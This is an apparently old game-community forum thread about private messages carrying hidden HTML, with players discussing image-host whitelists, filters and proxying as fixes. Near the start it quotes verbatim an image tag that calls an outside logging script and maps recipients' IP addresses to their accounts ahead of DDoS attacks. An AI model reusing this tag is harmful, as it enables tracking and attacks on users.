Empty PMs linked to hacking incident.
 

Players on UN have been receiving empty PM's from various different players. We've done some snooping and found that the PM's aren't actually empty, and contain the following HTML code.

<img src="http://surgecraft.org/log.php?a=#a&b=.jpg>

The fact that the php file is named log isn't very comforting. I don't actually know how to tackle the issue apart other than not open your PM's for the time being, which isn't very practical X_X

Yeah he DCed my net, at least he said sorry afterwards though.

:3 This is getting slightly out of hand all of this hacking nonsense.

Append to wordfilter/rules.txt

I emailed Stefan about it so that maybe he can help with a permanent fix. I agree its extremely annoying.

I swear I used to be able to disable images in pm's in an option but it doesn't seem to be there anymore.

If its the same code you posted, than Im aondering how many PMs the "hacker" will have to send until he does realize that there is a " missing at the end.

lol

The only way to fix this particular exploit is to have a white-list of image hosts (i.e. imgur, imageshack, or tinypic) for linking images in PMs.

Also the filter I just posted does disable images in pm's.

Thanks added it, working on server pms but doesn't disable images from global pms. Any way I could do that?

I & Kevin discovered this weeks ago, thought it was common knowledge due to some incidents on UN which PWA dealt with.

Stefan contacted me and put a filter in for it and is going to see if he can resolve the issue within the client but could not get it to crash the v6 client at all. Are any of you who actually have the problem using v6? He suggests everyone update their version.

Fantastic, thank you.

This isn't about a crash at all, it's just linking an image and logging their IP Addresses. The attacker then DDoS'd the IPs.

Thanks fp

never!! :p

Disabling images in pm's then is really the only other option to protect everyone. Stefan has asked and I've advised its the best course of action unless we can reenable the option to turn imaging on and off in pm's.

To disable html in PM's the old fashioned way, please do the following procedure:
close graal before doing anything
1) go into your Graal folder.
2) find control2config.txt
3)locate the line nohtmlinpms=false
4) change the value to true.
5) save and exit
7)start up graal
8)be sure to check the txt file after graal loads to see if it changed back or not

Disregard this post. That's for RC.

That's the config file for RC. It does not apply to the client at all.

Ah, I see.

In that case, where is the command to shut off this located, perhaps?
"File download: http://pics.fort90.com/cdi_link.gif (size: 43364) done"

On a side note, putting:
nohtmlinpms=true
nohtmlimages=true
into the game_config did alter the way images were presented, just a tad. Doesn't stop them from loading, though.

As far as I'm aware, it's not possible to completely disable HTML in PMs anymore.

That seems rather faulty. There has to be a way, somewhere.
I swore in the old versions of the game there was an option for it. Has anyone tried applying that to the current v6?

Also, when I look in the PO gui files there seems to have been an attempt to insert a switch (at least the text for one) into the GUI to turn off html in pms.
I can't find it anywhere in the actual GUI though.

There was, but it's not the same anymore. Current HTML parsing is done in GS2's GUI system.

Well, I'm stumped then!

Should probably censor some of the html code so someone else doesn't start doing it too.

I would rather just see a whitelist of image hosts (including u.graalcenter.org !!). Message codes should be disabled as well. Stuff like "#1" is just annoying, while "#a" in HTML can be a real problem (since it lets you easily map IPs -> accounts).

I vehemently disagree with the idea of disabling displaying images in PMs. I do agree with the idea of getting rid of #a, etc. though.

Having HTML and allowing images to be displayed opens up so much customization in PMs for players. I see players using it all the time to advertise items they're selling on Era and other servers by showing the item's icon and stuff.

Players could possibly have the option to disable the <img> tag linking to external sources maybe (that would mean if you tried to display an image that exists on the server it would still work, so players could link to item icons, etc), but leave HTML alone.

I do not want to see images being removed from PMs though.

era must have some creative folk because i've never seen it used on zodiac or era. i like chris' whitelist idea.

It is used a lot in masses. Mostly I find it annoying, but I too wouldn't like to see it disabled entirely. 6,436 uses in masses since September 2011. Stuff like...

http://i294.photobucket.com/albums/m...ds/Ad37-19.png

http://i1206.photobucket.com/albums/...8/DairyHut.png

http://i1141.photobucket.com/albums/...mapImage-1.png

(just a few off the top)

The solution is obviously to download images to the game server as a proxy and then send them to the client.

Indeed. It's the only logical approach to this problem.

Some of these are more diverting my attention away than towards their advertisements.

like i said, era folk must be creative because it's never seen on zod or un

Being the kind person I am, I casually contacted the person doing this and he said that he has ceased the attacks.

Putting it in bold certainly lets us know your opinion of it, lol. I don't like the idea of having to remove images either but this has become a serious problem with Graalians from all servers affected. Yes, some servers have put in filters and yes, Stefan has added key words to the main filters but we all know that only lasts so long.

Personally my first choice is to make imaging an option again, then you could add all the filters you wanted but at least you would have the option of shutting them off until such time as a new filter could be added. That option is up to Stefan though, I don't and didn't know if its a possible solution to the problem. Hopefully it is.

Disable php format from being used as an image?

I like this idea personally.

I hope he fully disables HTML. Many a times players have reported pornographic and visually disturbing images PMed to them via mass or private message. The item selling ads are creative and fun but the images of men or females bending over and exposing themselves is not suitable or relevant to the game. At least I don't think they are.

Welcome to the internet, where **** happens.

Only If I hadn't given rep yesterday :C

It's not that simple, you can log image requests in general. I.e. In Rails:

Started GET "/test_fowlplay4.png" for 127.0.0.1 at 2012-05-21 09:43:46 -0700

I still think the best option will be a white-list of approved image hosts, and then an player-list option to disable the rendering of external images in PMs.

Unless Stefan can script it into the PM system we'll likely need a client update (we're way overdue already).